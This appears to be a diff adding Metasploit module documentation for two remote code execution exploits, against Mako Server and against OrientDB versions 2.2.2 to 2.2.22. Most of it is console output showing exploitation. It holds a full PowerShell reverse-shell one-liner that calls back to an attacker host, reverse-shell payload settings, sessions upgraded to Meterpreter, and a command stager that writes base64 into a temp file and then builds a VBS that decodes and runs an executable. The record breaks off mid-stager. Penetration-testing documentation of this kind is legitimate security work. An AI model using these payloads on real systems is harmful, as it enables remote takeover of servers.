This module has been verified against the following Mako Server versions for Windows XP SP3, Windows 7 SP1 and Linux Ubuntu 16.04 LTS:
|
||||||
|
- v2.5
|
||||||
|
- v2.6
|
||||||
|
|
||||||
|
Links:
|
||||||
|
- [Windows x86 installer](https://makoserver.net/download/mako.windows.x86.exe)
|
||||||
|
- [Windows download page](https://makoserver.net/download/windows)
|
||||||
|
- [Linux x64 installer](https://makoserver.net/download/mako.linux-x64.tar.gz)
|
||||||
|
- [Linux download page](https://makoserver.net/download/linux-x86)
|
||||||
|
- [Documentation](https://makoserver.net/download/manual)
|
||||||
|
|
||||||
|
## References for vulnerability
|
||||||
|
- https://blogs.securiteam.com/index.php/archives/3391
|
||||||
|
- https://www.exploit-db.com/exploits/42683
|
||||||
|
|
||||||
|
## Verification Steps for Windows
|
||||||
|
|
||||||
|
1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work)
|
||||||
|
2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop
|
||||||
|
4. Start msfconsole on host
|
||||||
|
5. Do: ```use exploit/multi/http/makoserver_cmd_exec```
|
||||||
|
6. Do: ```set RHOST <IP address of target system>```
|
||||||
|
7. Do: ```set PAYLOAD cmd/windows/reverse_powershell```
|
||||||
|
8. Do: ```set LHOST <IP address of host system>```
|
||||||
|
9. Do: ```exploit```
|
||||||
|
10. You should get a Windows command shell
|
||||||
|
|
||||||
|
## Verification Steps for Linux
|
||||||
|
|
||||||
|
1. Extract the "mako.linux-x64.tar.gz" on a Linux Ubuntu 16.04 LTS (x64) target (with Python for this example to work)
|
||||||
|
2. From inside the extracted folder, do ```./rundemo.sh```
|
||||||
|
4. Start msfconsole on host
|
||||||
|
5. Do: ```use exploit/multi/http/makoserver_cmd_exec```
|
||||||
|
6. Do: ```set RHOST <IP address of target system>```
|
||||||
|
7. Do: ```set PAYLOAD cmd/unix/python_reverse```
|
||||||
|
8. Do: ```set LHOST <IP address of host system>```
|
||||||
|
9. Do: ```exploit```
|
||||||
|
10. You should get a Linux command shell (may need to wait ~30 seconds)
|
||||||
|
|
||||||
|
## Example Output
|
||||||
|
```
|
||||||
|
msf > use exploit/multi/http/makoserver_cmd_exec
|
||||||
|
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
|
||||||
|
RHOST => 10.10.10.3
|
||||||
|
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
|
||||||
|
PAYLOAD => cmd/windows/reverse_powershell
|
||||||
|
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
|
||||||
|
LHOST => 10.10.10.2
|
||||||
|
msf exploit(makoserver_cmd_exec) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 10.10.10.2:4444
|
||||||
|
[*] Sending payload to target...
|
||||||
|
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400
|
||||||
|
|
||||||
|
Microsoft Windows
|
||||||
|
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
|
||||||
|
|
||||||
|
C:\Users\Smith\Downloads\MakoServer>
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
## Example Verbose Output
|
||||||
|
```
|
||||||
|
msf > use exploit/multi/http/makoserver_cmd_exec
|
||||||
|
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
|
||||||
|
RHOST => 10.10.10.3
|
||||||
|
msf exploit(makoserver_cmd_exec) > set VERBOSE true
|
||||||
|
VERBOSE => true
|
||||||
|
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
|
||||||
|
PAYLOAD => cmd/windows/reverse_powershell
|
||||||
|
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
|
||||||
|
LHOST => 10.10.10.2
|
||||||
|
msf exploit(makoserver_cmd_exec) > check
|
||||||
|
|
||||||
|
[*] Trying to detect running Mako Server and necessary files...
|
||||||
|
[*] Mako Server save.lsp returns correct ouput.
|
||||||
|
[*] 10.10.10.3:80 The target appears to be vulnerable.
|
||||||
|
msf exploit(makoserver_cmd_exec) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 10.10.10.2:4444
|
||||||
|
[*] Sending payload to target...
|
||||||
|
[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]])
|
||||||
|
[*] Sending PUT request to save.lsp...
|
||||||
|
[*] Sending GET request to manage.lsp...
|
||||||
|
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400
|
||||||
|
|
||||||
|
Microsoft Windows
|
||||||
|
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
|
||||||
|
|
||||||
|
C:\Users\Smith\Downloads\MakoServer>
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Targeting Windows 7 SP1 x64 running Mako Server v2.5
|
||||||
|
|
||||||
|
A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session:
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/multi/http/makoserver_cmd_exec
|
||||||
|
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
|
||||||
|
RHOST => 10.10.10.2
|
||||||
|
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
|
||||||
|
PAYLOAD => cmd/windows/reverse_powershell
|
||||||
|
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
|
||||||
|
LHOST => 10.10.10.4
|
||||||
|
msf exploit(makoserver_cmd_exec) > check
|
||||||
|
[*] 10.10.10.2:80 The target appears to be vulnerable.
|
||||||
|
msf exploit(makoserver_cmd_exec) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 10.10.10.4:4444
|
||||||
|
[*] Sending payload to target...
|
||||||
|
[*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:49189) at 2017-10-25 20:57:56 -0400
|
||||||
|
|
||||||
|
Microsoft Windows
|
||||||
|
Copyright (c) Microsoft Corporation. All rights reserved.
|
||||||
|
|
||||||
|
C:\Users\Smith\Downloads\MakoServer>^Z
|
||||||
|
Background session 1? [y/N] y
|
||||||
|
msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
|
||||||
|
msf post(shell_to_meterpreter) > sessions -l
|
||||||
|
|
||||||
|
Active sessions
|
||||||
|
===============
|
||||||
|
|
||||||
|
Id Name Type Information Connection
|
||||||
|
-- ---- ---- ----------- ----------
|
||||||
|
1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2)
|
||||||
|
msf post(shell_to_meterpreter) > set SESSION 1
|
||||||
|
SESSION => 1
|
||||||
|
msf post(shell_to_meterpreter) > set LPORT 8080
|
||||||
|
LPORT => 8080
|
||||||
|
msf post(shell_to_meterpreter) > exploit
|
||||||
|
|
||||||
|
[*] Upgrading session ID: 1
|
||||||
|
[*] Starting exploit/multi/handler
|
||||||
|
[*] Started reverse TCP handler on 10.10.10.4:8080
|
||||||
|
[-] Powershell is not installed on the target.
|
||||||
|
[*] Command stager progress: 1.66% (1699/102108 bytes)
|
||||||
|
...
|
||||||
|
[*] Command stager progress: 100.00% (102108/102108 bytes)
|
||||||
|
[*] Post module execution completed
|
||||||
|
msf post(shell_to_meterpreter) > sessions -l
|
||||||
|
|
||||||
|
Active sessions
|
||||||
|
===============
|
||||||
|
|
||||||
|
Id Name Type Information Connection
|
||||||
|
-- ---- ---- ----------- ----------
|
||||||
|
1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2)
|
||||||
|
2 meterpreter x86/windows smith-PC\smith @ SMITH-PC 10.10.10.4:8080 -> 10.10.10.2:49190 (10.10.10.2)
|
||||||
|
|
||||||
|
msf post(shell_to_meterpreter) > sessions -i 2
|
||||||
|
[*] Starting interaction with 2...
|
||||||
|
|
||||||
|
meterpreter > getuid
|
||||||
|
Server username: smith-PC\smith
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : SMITH-PC
|
||||||
|
OS : Windows 7 (Build 7601, Service Pack 1).
|
||||||
|
Architecture : x64
|
||||||
|
System Language : en_US
|
||||||
|
Domain : WORKGROUP
|
||||||
|
Logged On Users : 2
|
||||||
|
Meterpreter : x86/windows
|
||||||
|
```
|
||||||
|
|
||||||
|
### Targeting Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5
|
||||||
|
|
||||||
|
A typical scenario would be to obtain a Linux command shell and then upgrade to a Meterpreter session:
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/multi/http/makoserver_cmd_exec
|
||||||
|
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
|
||||||
|
RHOST => 10.10.10.2
|
||||||
|
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python
|
||||||
|
PAYLOAD => cmd/unix/reverse_python
|
||||||
|
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
|
||||||
|
LHOST => 10.10.10.4
|
||||||
|
msf exploit(makoserver_cmd_exec) > check
|
||||||
|
[*] 10.10.10.2:80 The target appears to be vulnerable.
|
||||||
|
msf exploit(makoserver_cmd_exec) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 10.10.10.4:4444
|
||||||
|
[*] Sending payload to target...
|
||||||
|
[*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57888) at 2017-11-10 15:52:33 -0500
|
||||||
|
|
||||||
|
ls
|
||||||
|
LICENSE.txt
|
||||||
|
mako
|
||||||
|
mako.zip
|
||||||
|
README.txt
|
||||||
|
rundemo.sh
|
||||||
|
tutorial
|
||||||
|
^Z
|
||||||
|
Background session 1? [y/N] y
|
||||||
|
msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
|
||||||
|
msf post(shell_to_meterpreter) > sessions -l
|
||||||
|
|
||||||
|
Active sessions
|
||||||
|
===============
|
||||||
|
|
||||||
|
Id Name Type Information Connection
|
||||||
|
-- ---- ---- ----------- ----------
|
||||||
|
1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
|
||||||
|
|
||||||
|
msf post(shell_to_meterpreter) > set SESSION 1
|
||||||
|
SESSION => 1
|
||||||
|
msf post(shell_to_meterpreter) > set LPORT 8080
|
||||||
|
LPORT => 8080
|
||||||
|
msf post(shell_to_meterpreter) > exploit
|
||||||
|
|
||||||
|
[*] Upgrading session ID: 1
|
||||||
|
[*] Starting exploit/multi/handler
|
||||||
|
[*] Started reverse TCP handler on 10.10.10.4:8080
|
||||||
|
[*] Sending stage (847604 bytes) to 10.10.10.2
|
||||||
|
[*] Meterpreter session 2 opened (10.10.10.4:8080 -> 10.10.10.2:60448) at 2017-11-10 15:54:38 -0500
|
||||||
|
[*] Command stager progress: 100.00% (736/736 bytes)
|
||||||
|
[*] Post module execution completed
|
||||||
|
msf post(shell_to_meterpreter) > sessions -l
|
||||||
|
|
||||||
|
Active sessions
|
||||||
|
===============
|
||||||
|
|
||||||
|
Id Name Type Information Connection
|
||||||
|
-- ---- ---- ----------- ----------
|
||||||
|
1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
|
||||||
|
2 meterpreter x86/linux uid=1000, gid=1000, euid=1000, egid=1000 @ 10.10.10.2 10.10.10.4:8080 -> 10.10.10.2:60448 (10.10.10.2)
|
||||||
|
msf post(shell_to_meterpreter) > sessions -i 2
|
||||||
|
[*] Starting interaction with 2...
|
||||||
|
|
||||||
|
meterpreter > getuid
|
||||||
|
Server username: uid=1000, gid=1000, euid=1000, egid=1000
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : 10.10.10.2
|
||||||
|
OS : Ubuntu 16.04 (Linux 4.10.0-35-generic)
|
||||||
|
Architecture : x64
|
||||||
|
Meterpreter : x86/linux
|
||||||
|
```
|
|
@ -0,0 +1,91 @@
|
||||||
|
This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
|
||||||
|
|
||||||
|
All versions from 2.2.2 up to 2.2.22 should be vulnerable.
|
||||||
|
|
||||||
|
The module is based on the public PoC found here: [securiteam](https://blogs.securiteam.com/index.php/archives/3318)
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
OrientDB 2.2.2 <= 2.2.22
|
||||||
|
|
||||||
|
## Installation
|
||||||
|
Download a vulnerable OrientDB version here: [orientdb](http://orientdb.com/download-previous/)
|
||||||
|
|
||||||
|
```
|
||||||
|
wget http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi
|
||||||
|
unzip orientdb-community-2.2.20.zip
|
||||||
|
chmod 755 bin/*.sh
|
||||||
|
chmod -R 777 config
|
||||||
|
cd bin
|
||||||
|
./server.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
## References for running OrientDB
|
||||||
|
|
||||||
|
[Install](http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html)
|
||||||
|
|
||||||
|
[Run](http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html)
|
||||||
|
|
||||||
|
## References for vulnerability
|
||||||
|
|
||||||
|
[securiteam](https://blogs.securiteam.com/index.php/archives/3318)
|
||||||
|
[palada](http://www.palada.net/index.php/2017/07/13/news-2112/)
|
||||||
|
[github](https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017)
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start `msfconsole`
|
||||||
|
2. `use exploit/multi/http/orientdb_exec`
|
||||||
|
3. `set rhost <RHOST>`
|
||||||
|
4. `set target <TARGET_NUMBER>`
|
||||||
|
5. `set workspace <WORKSPACE>`
|
||||||
|
6. `check`
|
||||||
|
7. **Verify** if the OrientDB instance is vulnerable
|
||||||
|
8. `run`
|
||||||
|
9. **Verify** you get a session
|
||||||
|
|
||||||
|
## Example Output
|
||||||
|
|
||||||
|
### OrientDB 2.2.20 on Windows XP
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/multi/http/orientdb_exec
|
||||||
|
msf exploit(orientdb_exec) > set rhost 2.2.2.2
|
||||||
|
rhost => 2.2.2.2
|
||||||
|
msf exploit(orientdb_exec) > set target 2
|
||||||
|
target => 2
|
||||||
|
msf exploit(orientdb_exec) > check
|
||||||
|
|
||||||
|
[+] Version: OrientDB Server v.2.2.20 (build 76ab59e72943d0ba196188ed100c882be4315139)
|
||||||
|
[+] 2.2.2.2:2480 The target is vulnerable.
|
||||||
|
msf exploit(orientdb_exec) > set verbose true
|
||||||
|
verbose => true
|
||||||
|
msf exploit(orientdb_exec) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||||
|
[*] 2.2.2.2:2480 - Sending command stager...
|
||||||
|
[*] Attempting to execute: echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAWNfbSQAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAAByMQAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\aAqsZ.b64
|
||||||
|
[*] Command Stager progress - 2.01% done (2046/101881 bytes)
|
||||||
|
[*] Attempting to execute: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\aAqsZ.b64
|
||||||
|
[*] Command Stager progress - 4.02% done (4092/101881 bytes)
|
||||||
|
```
|
||||||
|
|
||||||
|
...snip...
|
||||||
|
|
||||||
|
```
|
||||||
|
[*] Attempting to execute: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\aAqsZ.b64 & echo Set fs = CreateObject("Scripting.FileSystemObject") >>%TEMP%\uFLQh.vbs & echo Set file = fs.GetFile("%TEMP%\aAqsZ.b64") >>%TEMP%\uFLQh.vbs & echo If file.Size Then >>%TEMP%\uFLQh.vbs & echo Set fd = fs.OpenTextFile("%TEMP%\aAqsZ.b64", 1) >>%TEMP%\uFLQh.vbs & echo data = fd.ReadAll >>%TEMP%\uFLQh.vbs & echo data = Replace(data, vbCrLf, "") >>%TEMP%\uFLQh.vbs & echo data = base64_decode(data) >>%TEMP%\uFLQh.vbs & echo fd.Close >>%TEMP%\uFLQh.vbs & echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("%TEMP%\tIzcO.exe", 2, True) >>%TEMP%\uFLQh.vbs & echo ofs.Write data >>%TEMP%\uFLQh.vbs & echo ofs.close >>%TEMP%\uFLQh.vbs & echo Set shell = CreateObject("Wscript.Shell") >>%TEMP%\uFLQh.vbs
|
||||||
|
[*] Command Stager progress - 98.40% done (100252/101881 bytes)
|
||||||
|
[*] Attempting to execute: echo shell.run "%TEMP%\tIzcO.exe", 0, false >>%TEMP%\uFLQh.vbs & echo Else >>%TEMP%\uFLQh.vbs & echo Wscript.Echo "The file is empty." >>%TEMP%\uFLQh.vbs & echo End If >>%TEMP%\uFLQh.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\uFLQh.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\uFLQh.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\uFLQh.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\uFLQh.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\uFLQh.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\uFLQh.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\uFLQh.vbs & echo If Not w2 Then _ >>%TEMP%\uFLQh.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\uFLQh.vbs & echo If Not w3 Then _ >>%TEMP%\uFLQh.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\uFLQh.vbs & echo If Not w4 Then _ >>%TEMP%\uFLQh.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\uFLQh.vbs & echo 